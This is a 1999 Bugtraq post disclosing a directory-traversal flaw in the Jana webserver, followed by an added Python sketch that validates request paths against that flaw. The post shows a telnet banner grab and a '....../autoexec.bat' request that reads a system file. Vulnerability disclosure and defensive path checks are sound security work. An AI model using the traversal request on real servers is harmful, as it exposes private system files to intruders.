[12178] in bugtraq
Jana webserver exploit
daemon@ATHENA.MIT.EDU (Jason Lutz)
Fri Oct 8 18:38:30 1999
Message-Id: <010601bf119d$d205db00$359b95d1@spis.net>
Date: Fri, 8 Oct 1999 09:00:11 -0600
Reply-To: Jason Lutz <jason@SPIS.NET>
From: Jason Lutz <jason@SPIS.NET>
X-To: bugtraq@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM
Bugtraq,
I have found a security flaw in Jana 1.0 webserver. I have not been able
to find out any information on who makes this product nor a place to
download the web server package. This webserver seems to be included as
a suite of Internet services, one of which I think is web-based chat.
Enclosed is one exploit I have found in the limited time that I have had
to deal with this web server. I am posting this information now so that
one of you might know who makes this software and how I might be able to
get in touch with them for further testing.
[root@foo whis]# telnet x.x.x.x 80
Trying x.x.x.x...
Connected to x.x.x.x.
Escape character is '^]'.
GET / HTTP/1.0
HTTP/1.0 200 OK
Date: Mon, 04 Oct 1999 18:59:44 GMT
Server: Jana Server/1.40
Last-Modified: Mon, 04 Oct 1999 15:04:40 GMT
Content-Length: 38
Content-Type: text/html
Connection: close
<HTML><BODY><CENTER>TEST</BODY></HTML>Connection closed by foreign host.
[root@foo whis]#
http://server/....../autoexec.bat
Prints user's autoexec.bat
I would like to say thank you to rain.forest.puppy. for all his help.
Jason Lutz
Sprint Print Inc
jason@spis.net
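A defensive sketch of the request-path check whose absence the report above demonstrates, added here as an example and not code from the original post or from Jana. The function name `resolve_request_path`, the document root `/srv/www` and the sample requests are assumptions constructed for illustration.

```python
import posixpath
from urllib.parse import unquote


def resolve_request_path(doc_root, url_path):
    """Map a request path to a file under doc_root, or return None to refuse it."""
    # Drop the query string and percent-decode once, so %2e is seen as a dot.
    path = unquote(url_path.split("?", 1)[0])
    # NUL bytes and colons (drive letters, stream names) never belong in a served path.
    if "\x00" in path or ":" in path:
        return None
    segments = []
    for seg in path.replace("\\", "/").split("/"):
        if seg in ("", "."):
            continue  # empty and current-directory segments are harmless
        # Refuse any segment made only of dots and spaces: "..", "...", "......".
        # An equality test against ".." alone would let the longer runs through.
        if not seg.strip(". "):
            return None
        segments.append(seg)
    root = posixpath.normpath(doc_root)
    candidate = posixpath.normpath(posixpath.join(root, *segments))
    # Final containment check: the normalized result must still sit under the root.
    if posixpath.commonpath([root, candidate]) != root:
        return None
    return candidate


if __name__ == "__main__":
    # Constructed sample requests; the second is the form shown in the report.
    for req in ("/index.html", "/....../autoexec.bat", "/%2e%2e%2e/autoexec.bat",
                "/..\\..\\autoexec.bat", "/docs/a..b.txt"):
        print(f"{req!r:32} -> {resolve_request_path('/srv/www', req)}")
```

The check is lexical only; a server that follows symbolic links or junctions should also compare the fully resolved filesystem path against the resolved root before opening the file.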